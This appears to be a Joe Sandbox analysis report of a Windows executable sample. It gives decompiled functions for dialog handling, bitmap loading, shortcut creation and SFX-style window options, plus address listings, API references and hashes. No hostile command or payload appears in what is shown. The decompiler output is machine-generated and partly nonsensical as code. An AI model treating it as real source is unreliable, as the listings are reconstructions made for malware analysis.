										_push(__ebp - 0x6d4e);
										__eax = E000815E8(__ecx);
										__esp = __esp + 0x10;
										__eflags = __eax;
										if(__eax != 0) {
											__ecx = 0;
											 *__eax = __cx;
											__ebp - 0x3d08 = E000857E6(__ebp - 0x3d08, __ebp - 0x3d08);
											_pop(__ecx);
											_pop(__ecx);
										}
										L157:
										__eflags =  *((short*)(__ebp - 0x11d58));
										__ebx = 0x800;
										if( *((short*)(__ebp - 0x11d58)) != 0) {
											__ebp - 0x9d58 = __ebp - 0x11d58;
											__eax = E0006B239(__ebp - 0x11d58, __ebp - 0x9d58, 0x800);
										}
										__ebp - 0xbd58 = __ebp - 0x6d50;
										__eax = E0006B239(__ebp - 0x6d50, __ebp - 0xbd58, __ebx);
										__eflags =  *(__ebp - 0x4d08);
										if(__eflags == 0) {
											__ebp - 0x4d08 = E0007AB2E(__ecx, __ebp - 0x4d08,  *(__ebp - 0x14));
										}
										__ebp - 0x4d08 = E0006B207(__eflags, __ebp - 0x4d08, __ebx);
										__eflags =  *((short*)(__ebp - 0x17d58));
										if(__eflags != 0) {
											__ebp - 0x17d58 = __ebp - 0x4d08;
											E0006FE2E(__eflags, __ebp - 0x4d08, __ebp - 0x17d58, __ebx) = __ebp - 0x4d08;
											__eax = E0006B207(__eflags, __ebp - 0x4d08, __ebx);
										}
										__ebp - 0x4d08 = __ebp - 0xcd58;
										__eax = E000857E6(__ebp - 0xcd58, __ebp - 0x4d08);
										__eflags =  *(__ebp - 0x13d58);
										__eax = __ebp - 0x13d58;
										_pop(__ecx);
										_pop(__ecx);
										if(__eflags == 0) {
											__eax = __ebp - 0x19d58;
										}
										__ebp - 0x4d08 = E0006FE2E(__eflags, __ebp - 0x4d08, __ebp - 0x4d08, __ebx);
										__eax = __ebp - 0x4d08;
										__eflags = E0006B493(__ebp - 0x4d08);
										if(__eflags == 0) {
											L167:
											__ebp - 0x4d08 = E0006FE2E(__eflags, __ebp - 0x4d08, L".lnk", __ebx);
											goto L168;
										} else {
											L166:
											__eflags = __eax;
											if(__eflags == 0) {
												L168:
												_push(1);
												__eax = __ebp - 0x4d08;
												_push(__ebp - 0x4d08);
												E0006A04F(__ecx, __ebp) = __ebp - 0xbd58;
												__ebp - 0xad58 = E000857E6(__ebp - 0xad58, __ebp - 0xbd58);
												_pop(__ecx);
												_pop(__ecx);
												__ebp - 0xad58 = E0006BCCF(__eflags, __ebp - 0xad58);
												__ecx =  *(__ebp - 0x3d08) & 0x0000ffff;
												__eax = __ebp - 0x3d08;
												__ecx =  ~( *(__ebp - 0x3d08) & 0x0000ffff);
												__edx = __ebp - 0x9d58;
												__esi = __ebp - 0xad58;
												asm("sbb ecx, ecx");
												__ecx =  ~( *(__ebp - 0x3d08) & 0x0000ffff) & __ebp - 0x00003d08;
												 *(__ebp - 0x9d58) & 0x0000ffff =  ~( *(__ebp - 0x9d58) & 0x0000ffff);
												asm("sbb eax, eax");
												__eax =  ~( *(__ebp - 0x9d58) & 0x0000ffff) & __ebp - 0x00009d58;
												 *(__ebp - 0xad58) & 0x0000ffff =  ~( *(__ebp - 0xad58) & 0x0000ffff);
												__eax = __ebp - 0x15d58;
												asm("sbb edx, edx");
												__edx =  ~( *(__ebp - 0xad58) & 0x0000ffff) & __esi;
												E0007A5E4(__ebp - 0x15d58) = __ebp - 0x4d08;
												__ebp - 0xbd58 = E00079BDC(__ecx, __edi, __ebp - 0xbd58, __ebp - 0x4d08,  ~( *(__ebp - 0xad58) & 0x0000ffff) & __esi, __ebp - 0xbd58,  ~( *(__ebp - 0x9d58) & 0x0000ffff) & __ebp - 0x00009d58,  ~( *(__ebp - 0x3d08) & 0x0000ffff) & __ebp - 0x00003d08);
												__eflags =  *(__ebp - 0xcd58);
												if( *(__ebp - 0xcd58) != 0) {
													_push(__edi);
													__eax = __ebp - 0xcd58;
													_push(__ebp - 0xcd58);
													_push(5);
													_push(0x1000);
													__eax =  *0xc2078();
												}
												goto L172;
											}
											goto L167;
										}
									}
								case 0xa:
									L170:
									__eflags = __ebx - 7;
									if(__ebx == 7) {
										 *0xaa470 = 1;
									}
									goto L172;
								case 0xb:
									L81:
									__eax =  *(__ebp - 0x3508) & 0x0000ffff;
									__eax = E00086420( *(__ebp - 0x3508) & 0x0000ffff);
									__eflags = __eax - 0x46;
									if(__eax == 0x46) {
										 *0xa8461 = 1;
									} else {
										__eflags = __eax - 0x55;
										if(__eax == 0x55) {
											 *0xa8462 = 1;
										} else {
											__eax = 0;
											 *0xa8461 = __al;
											 *0xa8462 = __al;
										}
									}
									goto L172;
								case 0xc:
									L102:
									 *0xbec99 = 1;
									__eax = __eax + 0xbec99;
									_t115 = __esi + 0x39;
									 *_t115 =  *(__esi + 0x39) + __esp;
									__eflags =  *_t115;
									__ebp = 0xffffcaf8;
									if( *_t115 != 0) {
										_t117 = __ebp - 0x3508; // 0xffff95f0
										__eax = _t117;
										_push(_t117);
										 *0x9e5fc = E00071798();
									}
									goto L172;
							}
							L2:
							_push(0x1000);
							_push(_t295);
							_push(_t221);
							_t221 = E0007A6C7();
							_t295 = _t295 + 0x2000;
							_t291 = _t291 - 1;
							if(_t291 != 0) {
								goto L2;
							} else {
								_t296 = _t291;
								goto L4;
							}
						}
						L173:
						 *[fs:0x0] =  *((intOrPtr*)(_t300 - 0xc));
						return _t220;
					}
					L97:
					if(_t294 != 9) {
						goto L172;
					}
					L98:
					E0007CE22(_t300,  *((intOrPtr*)(_t300 + 8)), _t275, 1, 1);
					goto L99;
				}
			}

0x0007c40e
0x0007c40e
0x0007c40e
0x0007c40e
0x0007c40e
0x0007c410
0x0007c418
0x0007c426
0x00000000
0x00000000
0x0007c42c
0x0007c42c
0x0007c434
0x0007c435
0x0007c43a
0x0007c43b
0x0007c43e
0x00000000
0x00000000
0x0007c444
0x0007c444
0x0007c444
0x0007c447
0x0007c44a
0x0007c44c
0x0007c44f
0x0007c455
0x0007c457
0x0007c458
0x0007c45e
0x0007c45f
0x0007c45f
0x0007c464
0x0007c468
0x00000000
0x00000000
0x0007c46a
0x0007c472
0x00000000
0x00000000
0x0007c474
0x0007c479
0x0007c480
0x0007c485
0x0007c48c
0x0007c48e
0x0007c490
0x0007c497
0x0007c49e
0x0007c4a2
0x0007c4a2
0x0007c4a8
0x0007c4af
0x0007c4b6
0x0007c4ba
0x0007c4ba
0x0007c4bb
0x0007c4bd
0x0007c4c3
0x0007c4c4
0x0007c4c4
0x0007c4c7
0x0007c4c7
0x0007c4ca
0x0007c4ce
0x0007c4e5
0x0007c4e9
0x0007c4f2
0x0007c500
0x0007c500
0x0007c4f2
0x0007ca5c
0x0007ca5c
0x0007ca5c
0x0007ca61
0x0007ca65
0x0007ca69
0x0007ca70
0x0007ca77
0x0007ca7a
0x0007ca7f
0x0007ca82
0x0007ca87
0x0007be4b
0x0007be51
0x0007be57
0x0007be57
0x00000000
0x00000000
0x00000000
0x00000000
0x0007be71
0x0007be88
0x0007be8c
0x00000000
0x0007be8e
0x00000000
0x0007be8e
0x0007be8c
0x0007be96
0x00000000
0x00000000
0x0007be9c
0x0007be9c
0x00000000
0x0007bea3
0x0007bea3
0x0007bea6
0x0007beb9
0x0007bedf
0x0007bef3
0x0007bef6
0x0007bf01
0x0007c045
0x0007c045
0x0007c045
0x0007c04d
0x0007c053
0x0007c058
0x0007c05a
0x00000000
0x00000000
0x0007bf0b
0x0007bf13
0x0007bf19
0x0007bf1f
0x0007bfc5
0x0007bfcc
0x0007bfd2
0x0007bfd5
0x00000000
0x00000000
0x0007bfd7
0x0007bfde
0x0007bfe4
0x0007bfe6
0x00000000
0x0007bfe8
0x0007bfe8
0x0007bfea
0x0007bfeb
0x0007bfef
0x0007c003
0x0007c008
0x0007c012
0x0007c018
0x0007c01b
0x0007bfed
0x0007bfed
0x0007bfee
0x00000000
0x0007c01d
0x0007c02b
0x0007c031
0x0007c033
0x0007c03f
0x0007c03f
0x00000000
0x0007c033
0x0007c01b
0x0007bfe6
0x0007bf25
0x0007bf34
0x0007bf41
0x0007bf52
0x0007bf55
0x0007bf58
0x0007bf6b
0x0007bf72
0x0007bf77
0x0007bf79
0x00000000
0x00000000
0x0007bf7f
0x0007bf86
0x0007bf8b
0x0007bf90
0x0007bf9c
0x0007bfa1
0x0007bfa4
0x0007bfab
0x0007bfad
0x0007bfae
0x0007bfb8
0x0007bfbe
0x0007bfbf
0x00000000
0x0007bfbf
0x0007bf5a
0x0007bf61
0x0007bf67
0x0007bf69
0x00000000
0x00000000
0x00000000
0x0007bf69
0x0007c060
0x0007c060
0x0007c06a
0x0007c06a
0x00000000
0x00000000
0x0007c074
0x0007c074
0x0007c076
0x0007c0c9
0x0007c0ce
0x0007c0d7
0x0007c0d8
0x0007c0de
0x0007c0e3
0x0007c0e6
0x0007c0e8
0x0007c0fa
0x0007c0ff
0x0007c100
0x0007c100
0x0007c101
0x0007c103
0x0007c10a
0x0007c10f
0x0007c103
0x00000000
0x00000000
0x0007c115
0x0007c115
0x0007c117
0x0007c127
0x0007c127
0x00000000
0x00000000
0x0007c132
0x0007c132
0x0007c134
0x00000000
0x00000000
0x0007c13a
0x0007c13a
0x0007c141
0x00000000
0x00000000
0x0007c147
0x0007c147
0x0007c149
0x0007c14f
0x0007c151
0x0007c158
0x0007c159
0x0007c160
0x0007c162
0x0007c162
0x0007c169
0x0007c16e
0x0007c174
0x0007c176
0x00000000
0x0007c17c
0x0007c17c
0x0007c17c
0x0007c17f
0x0007c181
0x0007c182
0x0007c185
0x0007c1ae
0x0007c1ae
0x0007c1b1
0x0007c296
0x0007c29f
0x0007c2a4
0x0007c2a4
0x0007c2a6
0x0007c2a6
0x0007c2a8
0x0007c2aa
0x0007c2b1
0x0007c2b6
0x0007c2b7
0x0007c2b8
0x0007c2ba
0x0007c2bc
0x0007c2c0
0x0007c2c2
0x0007c2c2
0x0007c2c4
0x0007c2c4
0x0007c2c0
0x0007c2c8
0x0007c2ce
0x0007c2db
0x0007c2e2
0x0007c2f2
0x0007c2fc
0x0007c30a
0x0007c310
0x0007c318
0x0007c31d
0x0007c31e
0x0007c31f
0x0007c321
0x0007c335
0x0007c335
0x00000000
0x0007c321
0x0007c1b7
0x0007c1b7
0x0007c1ba
0x0007c1c7
0x0007c1c7
0x0007c1ca
0x0007c1cc
0x0007c1cd
0x0007c1cf
0x0007c1d0
0x0007c1d5
0x0007c1da
0x0007c1e0
0x0007c1e2
0x0007c1e4
0x0007c1e7
0x0007c1ee
0x0007c1ef
0x0007c1f5
0x0007c1f6
0x0007c1f9
0x0007c1fa
0x0007c1fb
0x0007c200
0x0007c203
0x0007c209
0x0007c212
0x0007c215
0x0007c21a
0x0007c21c
0x0007c21e
0x0007c220
0x0007c220
0x0007c222
0x0007c222
0x0007c224
0x0007c224
0x0007c22c
0x0007c233
0x0007c235
0x0007c23c
0x0007c242
0x0007c244
0x0007c245
0x0007c24d
0x0007c25c
0x0007c25c
0x0007c24d
0x0007c267
0x0007c269
0x0007c278
0x0007c27e
0x0007c284
0x0007c28f
0x0007c28f
0x00000000
0x0007c284
0x0007c1bc
0x0007c1bc
0x0007c1c1
0x00000000
0x00000000
0x00000000
0x0007c1c1
0x0007c187
0x0007c187
0x0007c18b
0x00000000
0x00000000
0x0007c18d
0x0007c18d
0x0007c190
0x0007c192
0x0007c195
0x00000000
0x0007c19b
0x0007c1a4
0x00000000
0x0007c1a4
0x0007c195
0x00000000
0x0007c340
0x0007c340
0x0007c341
0x0007c346
0x0007c348
0x0007c34a
0x0007c34b
0x0007c34b
0x00000000
0x0007c381
0x0007c381
0x0007c388
0x0007c38a
0x0007c38a
0x0007c38c
0x0007c3bb
0x0007c3bb
0x0007c3c1
0x00000000
0x0007c3c1
0x0007c38e
0x0007c38e
0x0007c38e
0x0007c391
0x0007c3aa
0x0007c3aa
0x0007c3b0
0x0007c3b0
0x00000000
0x0007c3b0
0x0007c393
0x0007c393
0x0007c393
0x0007c396
0x00000000
0x00000000
0x0007c398
0x0007c398
0x0007c398
0x0007c39b
0x00000000
0x00000000
0x0007c3a1
0x0007c3a1
0x00000000
0x00000000
0x00000000
0x00000000
0x0007c534
0x0007c534
0x0007c537
0x0007c6b8
0x0007c6b8
0x0007c6bb
0x0007c6c1
0x0007c6c8
0x0007c6ca
0x0007c6ca
0x0007c6d4
0x0007c6d4
0x00000000
0x0007c6bb
0x0007c53d
0x0007c53d
0x0007c543
0x0007c551
0x0007c55d
0x0007c55f
0x0007c561
0x0007c566
0x0007c566
0x0007c566
0x0007c57e
0x0007c58b
0x0007c590
0x0007c592
0x00000000
0x00000000
0x0007c564
0x0007c564
0x0007c564
0x0007c565
0x0007c565
0x0007c594
0x0007c59e
0x0007c5a4
0x0007c5ac
0x00000000
0x00000000
0x0007c5b2
0x0007c5b2
0x0007c5b9
0x00000000
0x00000000
0x0007c5bf
0x0007c5bf
0x0007c5c1
0x0007c5c8
0x0007c5ce
0x0007c5d0
0x0007c5d1
0x0007c5d6
0x0007c5d7
0x0007c5d8
0x0007c5da
0x0007c62e
0x0007c62e
0x0007c636
0x0007c644
0x0007c655
0x0007c663
0x0007c663
0x0007c66f
0x0007c674
0x0007c676
0x0007c686
0x0007c690
0x0007c695
0x0007c698
0x00000000
0x0007c69e
0x0007c69e
0x0007c6a3
0x0007c6a3
0x0007c6a5
0x0007c6ac
0x0007c6b2
0x00000000
0x0007c6b2
0x0007c698
0x0007c5dc
0x0007c5dc
0x0007c5de
0x0007c5e0
0x0007c5e7
0x00000000
0x00000000
0x0007c5e9
0x0007c5e9
0x0007c5eb
0x0007c5f1
0x0007c5f1
0x0007c5f1
0x0007c5f5
0x00000000
0x00000000
0x0007c5f7
0x0007c5f7
0x0007c5f8
0x0007c5fe
0x0007c601
0x0007c603
0x0007c606
0x00000000
0x00000000
0x0007c608
0x00000000
0x0007c608
0x0007c60a
0x0007c615
0x0007c61f
0x0007c624
0x0007c624
0x0007c626
0x00000000
0x00000000
0x0007c6e0
0x0007c6e0
0x0007c6e3
0x0007c6e5
0x0007c6ec
0x0007c6ee
0x0007c6f4
0x0007c6f5
0x0007c6fa
0x0007c6fb
0x0007c6fb
0x0007c700
0x0007c703
0x0007c709
0x0007c709
0x0007c70e
0x00000000
0x00000000
0x0007c71a
0x0007c71a
0x0007c71d
0x00000000
0x00000000
0x0007c723
0x0007c723
0x0007c725
0x0007c72c
0x0007c734
0x0007c73a
0x0007c73f
0x0007c742
0x0007c777
0x0007c77c
0x0007c782
0x0007c783
0x0007c788
0x0007c744
0x0007c744
0x0007c747
0x0007c74d
0x0007c763
0x0007c768
0x0007c769
0x0007c76e
0x0007c74f
0x0007c74f
0x0007c754
0x0007c755
0x0007c75a
0x0007c75a
0x0007c74d
0x0007c78f
0x0007c791
0x0007c798
0x0007c7a6
0x0007c7ad
0x0007c7b2
0x0007c7b3
0x0007c7b4
0x0007c7b6
0x0007c7b7
0x0007c7be
0x0007c807
0x0007c80e
0x0007c813
0x0007c815
0x00000000
0x00000000
0x0007c81b
0x0007c81b
0x0007c81d
0x0007c823
0x0007c82a
0x00000000
0x00000000
0x0007c82c
0x0007c82c
0x0007c82e
0x0007c82f
0x0007c82f
0x0007c82f
0x0007c832
0x0007c835
0x0007c83f
0x0007c83f
0x0007c841
0x0007c843
0x0007c84d
0x0007c852
0x0007c854
0x0007c892
0x0007c892
0x0007c895
0x0007c895
0x0007c897
0x0007c898
0x0007c898
0x00000000
0x0007c898
0x0007c856
0x0007c856
0x0007c858
0x0007c859
0x0007c85b
0x0007c85e
0x0007c873
0x0007c873
0x0007c875
0x0007c876
0x0007c876
0x0007c876
0x0007c879
0x0007c879
0x0007c87e
0x0007c87f
0x0007c885
0x0007c885
0x0007c886
0x0007c88b
0x0007c88c
0x0007c88d
0x00000000
0x0007c88d
0x0007c860
0x0007c860
0x0007c867
0x0007c86a
0x0007c86b
0x00000000
0x0007c86b
0x0007c837
0x0007c837
0x0007c839
0x0007c83a
0x0007c83d
0x00000000
0x00000000
0x00000000
0x0007c89a
0x0007c89a
0x0007c89d
0x0007c89d
0x0007c8a2
0x0007c8a4
0x0007c8a6
0x0007c8a6
0x0007c8a8
0x0007c8a8
0x00000000
0x0007c7c0
0x0007c7c0
0x0007c7c7
0x0007c7d3
0x0007c7d9
0x0007c7da
0x0007c7db
0x0007c7e0
0x0007c7e3
0x0007c7e5
0x0007c7eb
0x0007c7ed
0x0007c7fb
0x0007c800
0x0007c801
0x0007c801
0x0007c8ab
0x0007c8ab
0x0007c8b3
0x0007c8b8
0x0007c8c2
0x0007c8c9
0x0007c8c9
0x0007c8d6
0x0007c8dd
0x0007c8e2
0x0007c8ea
0x0007c8f6
0x0007c8f6
0x0007c903
0x0007c908
0x0007c910
0x0007c91a
0x0007c927
0x0007c92e
0x0007c92e
0x0007c93a
0x0007c941
0x0007c946
0x0007c94e
0x0007c954
0x0007c955
0x0007c956
0x0007c958
0x0007c958
0x0007c96d
0x0007c972
0x0007c97e
0x0007c980
0x0007c991
0x0007c99e
0x00000000
0x0007c982
0x0007c982
0x0007c98d
0x0007c98f
0x0007c9a3
0x0007c9a3
0x0007c9a5
0x0007c9ab
0x0007c9b1
0x0007c9bf
0x0007c9c4
0x0007c9c5
0x0007c9cd
0x0007c9d2
0x0007c9d9
0x0007c9df
0x0007c9e1
0x0007c9e7
0x0007c9ed
0x0007c9ef
0x0007c9f8
0x0007c9fb
0x0007c9fd
0x0007ca06
0x0007ca09
0x0007ca0f
0x0007ca12
0x0007ca1b
0x0007ca2a
0x0007ca2f
0x0007ca37
0x0007ca39
0x0007ca3a
0x0007ca40
0x0007ca41
0x0007ca43
0x0007ca48
0x0007ca48
0x00000000
0x0007ca37
0x00000000
0x0007c98f
0x0007c980
0x00000000
0x0007ca50
0x0007ca50
0x0007ca53
0x0007ca55
0x0007ca55
0x00000000
0x00000000
0x0007c3cd
0x0007c3cd
0x0007c3d5
0x0007c3db
0x0007c3de
0x0007c402
0x0007c3e0
0x0007c3e0
0x0007c3e3
0x0007c3f6
0x0007c3e5
0x0007c3e5
0x0007c3e7
0x0007c3ec
0x0007c3ec
0x0007c3e3
0x00000000
0x00000000
0x0007c50a
0x0007c50a
0x0007c50b
0x0007c510
0x0007c510
0x0007c510
0x0007c513
0x0007c518
0x0007c51e
0x0007c51e
0x0007c524
0x0007c52a
0x0007c52a
0x00000000
0x00000000
0x0007be58
0x0007be58
0x0007be5d
0x0007be5e
0x0007be5f
0x0007be64
0x0007be6a
0x0007be6d
0x00000000
0x0007be6f
0x0007be6f
0x00000000
0x0007be6f
0x0007be6d
0x0007ca8d
0x0007ca93
0x0007ca9d
0x0007ca9d
0x0007c4d0
0x0007c4d3
0x00000000
0x00000000
0x0007c4d9
0x0007c4e0
0x00000000
0x0007c4e0

APIs

_wcschr.LIBVCRUNTIME ref: 0007C435

Part of subcall function 000717AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0006BB05,00000000,.exe,?,?,00000800,?,?,000785DF,?), ref: 000717C2

Strings

HIDE, xrefs: 0007C474
MAX, xrefs: 0007C487
<, xrefs: 0007C41E
MIN, xrefs: 0007C4A3

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: CompareString_wcschr
String ID: <$HIDE$MAX$MIN
API String ID: 2548945186-3358265660
Opcode ID: 3172b1ee43c309c97178aa96e714758513b5af22b1a6c955e01c588e7a6659ba
Instruction ID: 5494c14572c26677230dc410792df59bee3310f3b9fae1c0d8615ed90a915bb8
Opcode Fuzzy Hash: 3172b1ee43c309c97178aa96e714758513b5af22b1a6c955e01c588e7a6659ba
Instruction Fuzzy Hash: 8531A272D00609AAEF35DA54DC41EEE77FCEB14304F00806AFA0C96091EBB89EC4CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0007ADED Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0007ADED(void* __ecx, void* __edx, void* __fp0) {
				intOrPtr _v20;
				intOrPtr _v24;
				void _v28;
				void* _t11;
				void* _t13;
				signed int _t20;
				signed int _t21;
				void* _t23;
				void* _t24;
				void* _t28;
				void* _t35;

				_t35 = __fp0;
				_t23 = __edx;
				_t24 = LoadBitmapW( *0xa0ed0, 0x65);
				_t21 = _t20 & 0xffffff00 | _t24 == 0x00000000;
				if(_t21 != 0) {
					_t24 = E00079E1C(0x65);
				}
				_t31 = _t24;
				if(_t24 == 0) {
					_v24 = 0x5d;
					_v20 = 0x12e;
				} else {
					GetObjectW(_t24, 0x18,  &_v28);
				}
				if(E00079D1A(_t31) != 0) {
					if(_t21 != 0) {
						_t28 = E00079E1C(0x66);
						if(_t28 != 0) {
							DeleteObject(_t24);
							_t24 = _t28;
						}
					}
					_t11 = E00079D5A(_v20);
					_t13 = E00079F5D(_t23, _t35, _t24, E00079D39(_v24), _t11);
					DeleteObject(_t24);
					_t24 = _t13;
				}
				return _t24;
			}

0x0007aded
0x0007aded
0x0007ae03
0x0007ae07
0x0007ae0c
0x0007ae15
0x0007ae15
0x0007ae17
0x0007ae19
0x0007ae2a
0x0007ae31
0x0007ae1b
0x0007ae22
0x0007ae22
0x0007ae3f
0x0007ae44
0x0007ae4d
0x0007ae51
0x0007ae54
0x0007ae5a
0x0007ae5a
0x0007ae51
0x0007ae5f
0x0007ae6f
0x0007ae77
0x0007ae7d
0x0007ae7f
0x0007ae87

APIs

LoadBitmapW.USER32(00000065), ref: 0007ADFD
GetObjectW.GDI32(00000000,00000018,?), ref: 0007AE22
DeleteObject.GDI32(00000000), ref: 0007AE54
DeleteObject.GDI32(00000000), ref: 0007AE77

Part of subcall function 00079E1C: FindResourceW.KERNEL32(0007AE4D,PNG,?,?,?,0007AE4D,00000066), ref: 00079E2E
Part of subcall function 00079E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,0007AE4D,00000066), ref: 00079E46
Part of subcall function 00079E1C: LoadResource.KERNEL32(00000000,?,?,?,0007AE4D,00000066), ref: 00079E59
Part of subcall function 00079E1C: LockResource.KERNEL32(00000000,?,?,?,0007AE4D,00000066), ref: 00079E64

Strings

], xrefs: 0007AE2A

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
String ID: ]
API String ID: 142272564-3352871620
Opcode ID: 9198af5c00568d2de8430da527771da77e96816dc0eacdfeca656c917e5b615f
Instruction ID: 4d0951a4f2bad7b93b269d3af8ba2c12b82a47462887ae44a47dcbd3709c4b0e
Opcode Fuzzy Hash: 9198af5c00568d2de8430da527771da77e96816dc0eacdfeca656c917e5b615f
Instruction Fuzzy Hash: B2012B32E40215A7D71077649C05EBF77B9ABC2B51F188011FD08A7292DF3D4C2186B6

Uniqueness

Uniqueness Score: -1.00%

Function 0007CC90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0007CC90(void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				void* _t12;
				WCHAR* _t16;
				void* _t17;
				intOrPtr _t18;
				void* _t19;
				struct HWND__* _t21;
				signed short _t22;

				_t16 = _a16;
				_t22 = _a12;
				_t21 = _a4;
				_t18 = _a8;
				if(E0006130B(_t17, _t21, _t18, _t22, _t16, L"RENAMEDLG", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t19 = _t18 - 0x110;
				if(_t19 == 0) {
					 *0xbecac = _t16;
					SetDlgItemTextW(_t21, 0x66, _t16);
					SetDlgItemTextW(_t21, 0x68,  *0xbecac);
					goto L10;
				}
				if(_t19 != 1) {
					L5:
					return 0;
				}
				_t12 = (_t22 & 0x0000ffff) - 1;
				if(_t12 == 0) {
					GetDlgItemTextW(_t21, 0x68,  *0xbecac, 0x800);
					_push(1);
					L7:
					EndDialog(_t21, ??);
					goto L10;
				}
				if(_t12 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}

0x0007cc91
0x0007cc96
0x0007cc9b
0x0007cca0
0x0007ccb8
0x0007cd1a
0x00000000
0x0007cd1c
0x0007ccba
0x0007ccc0
0x0007ccff
0x0007cd05
0x0007cd14
0x00000000
0x0007cd14
0x0007ccc5
0x0007ccd4
0x00000000
0x0007ccd4
0x0007ccca
0x0007cccd
0x0007ccf1
0x0007ccf7
0x0007ccda
0x0007ccdb
0x00000000
0x0007ccdb
0x0007ccd2
0x0007ccd8
0x00000000
0x0007ccd8
0x00000000

APIs

Part of subcall function 0006130B: GetDlgItem.USER32(00000000,00003021), ref: 0006134F
Part of subcall function 0006130B: SetWindowTextW.USER32(00000000,000935B4), ref: 00061365

EndDialog.USER32(?,00000001), ref: 0007CCDB
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0007CCF1
SetDlgItemTextW.USER32(?,00000066,?), ref: 0007CD05
SetDlgItemTextW.USER32(?,00000068), ref: 0007CD14

Strings

RENAMEDLG, xrefs: 0007CCA8

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: 95653750703dc3775d3b5a8273c38ae1344dfdf457ad59ad7311d7d1f600c37d
Instruction ID: 7c978f3390129adfa083d095808a1fe7733ba740ab9e6148416373b503e14ec3
Opcode Fuzzy Hash: 95653750703dc3775d3b5a8273c38ae1344dfdf457ad59ad7311d7d1f600c37d
Instruction Fuzzy Hash: 05016833B843147BF1224F249C08F9B3B9CEB5A702F148029F34AA60E1C6AD59018729

Uniqueness

Uniqueness Score: -1.00%

Function 000875C2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00087573,00000000,?,00087513,00000000,0009BAD8,0000000C,0008766A,00000000,00000002), ref: 000875E2
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 000875F5
FreeLibrary.KERNEL32(00000000,?,?,?,00087573,00000000,?,00087513,00000000,0009BAD8,0000000C,0008766A,00000000,00000002), ref: 00087618

Strings

CorExitProcess, xrefs: 000875ED
mscoree.dll, xrefs: 000875DB

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 81a7a9420184650dd13cd0bae2b6145ec6dd512740668d785bcf89191c8303a3
Instruction ID: 9b16e8fe9df0899314dffa55274e56cdee0d08599d43478e7b84fb9dbe8881ba
